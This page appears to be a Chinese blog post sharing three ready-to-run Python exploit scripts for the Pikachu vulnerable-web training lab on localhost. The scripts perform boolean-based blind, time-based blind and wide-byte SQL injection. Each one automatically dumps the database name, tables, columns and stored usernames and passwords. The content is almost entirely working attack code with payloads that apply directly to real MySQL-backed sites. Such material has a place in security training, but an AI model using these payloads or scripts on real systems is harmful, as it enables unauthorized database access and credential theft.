当前位置：首页 > news >正文

Pikachu的python一键exp，盲注(base on boolian)，盲注(base on time)，宽字节注入

news 2026/4/24 23:13:09

1.盲注(base on boolian)

import requests import time #盲注(boolian) # ===================== 配置（100%匹配你的原理） ===================== url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_b.php" base_params = { "name": "", "submit": "查询" } TRUE_TEXT = "your uid" # 真 FALSE_TEXT = "username不存在" # 假 # ==================================================================== def bool_check(payload): """发送payload，返回True=真，False=假""" params = base_params.copy() params["name"] = payload try: res = requests.get(url, params=params, timeout=3) if TRUE_TEXT in res.text and FALSE_TEXT not in res.text: return True return False except: return False def get_length(sql): """猜解长度""" for l in range(1, 50): payload = f"kobe' and length(({sql}))={l}#" if bool_check(payload): return l return 0 def get_content(sql): """逐字符猜解内容""" length = get_length(sql) result = "" for i in range(1, length + 1): for ascii_code in range(32, 127): char = chr(ascii_code) payload = f"kobe' and ascii(substr(({sql}),{i},1))={ascii_code}#" if bool_check(payload): result += char print(f"\r[+] 已获取：{result}", end="") break return result # ===================== 开始脱库 ===================== print("=" * 60) print("🔥 PIKACHU 布尔盲注 ") print("=" * 60) print("\n[1] 数据库名：", end="") db_name = get_content("select database()") print(f" => {db_name}") print("\n[2] 所有表名：", end="") tables = get_content("select group_concat(table_name) from information_schema.tables where table_schema=database()") print(f" => {tables}") print("\n[3] member 字段：", end="") cols = get_content("select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='member'") print(f" => {cols}") print("\n[4] 账号密码：", end="") data = get_content("select group_concat(username,':',pw) from member") print(f" => {data}") print("\n✅ 脱库完成！")

2.盲注(base on time)

import requests import time # ===================== 【必须是时间盲注页面】 ===================== url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_t.php" base_params = { "name": "", "submit": "查询" } SLEEP = 2 # ================================================================= def time_check(payload): params = base_params.copy() params["name"] = payload start = time.time() try: requests.get(url, params=params, timeout=5) except: pass end = time.time() return end - start >= SLEEP def get_length(sql): for l in range(1, 50): payload = f"kobe' and if(length(({sql}))={l}, sleep({SLEEP}), 1)#" if time_check(payload): return l return 0 def get_content(sql): length = get_length(sql) result = "" for i in range(1, length + 1): for asc in range(32, 127): payload = f"kobe' and if(ascii(substr(({sql}),{i},1))={asc}, sleep({SLEEP}), 1)#" if time_check(payload): result += chr(asc) print(f"\r[+] 已获取：{result}", end="") break return result # ===================== 开始 ===================== print("=" * 60) print("🔥 PIKACHU 时间盲注 ") print("=" * 60) print("\n数据库名：", end="") db = get_content("select database()") print(f" => {db}") print("\n表名：", end="") tables = get_content("select group_concat(table_name) from information_schema.tables where table_schema=database()") print(f" => {tables}") print("\n字段：", end="") cols = get_content("select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='member'") print(f" => {cols}") print("\n账号密码：", end="") data = get_content("select group_concat(username,':',pw) from member") print(f" => {data}") print("\n✅ 脱库完成！")

3.宽字节注入

import requests target = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_widebyte.php" headers = { "Content-Type": "application/x-www-form-urlencoded" } def exp(payload): post_data = payload.encode() res = requests.post(target, data=post_data, headers=headers).text if "your uid:" in res: uid = res.split("your uid:")[1].split("<br />")[0].strip() email = res.split("your email is:")[1].split("</p>")[0].strip() return uid, email return None, None if __name__ == "__main__": print("======== Pikachu 宽字节注入 全套EXP ========\n") # 1. 查询库名 + 版本 u1,e1 = exp("name=1%df' union select database(),version() #&submit=%E6%9F%A5%E8%AF%A2") print(f"[1] 当前数据库：{u1}") print(f"[2] MySQL版本：{e1}\n") # 2. 查询所有表名 u2,e2 = exp("name=1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&submit=%E6%9F%A5%E8%AF%A2") print(f"[3] 全部数据表：{e2}\n") # 3. ✅ 修复：查询users表所有字段（加反引号） u3,e3 = exp("name=1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' #&submit=%E6%9F%A5%E8%AF%A2") print(f"[4] users表字段：{e3}\n") # 4. 爆账号密码 u4,e4 = exp("name=1%df' union select username,password from users limit 0,1 #&submit=%E6%9F%A5%E8%AF%A2") print(f"[5] 账号：{u4}") print(f"[6] 密码：{e4}")

查看全文

http://www.jsqmd.com/news/694918/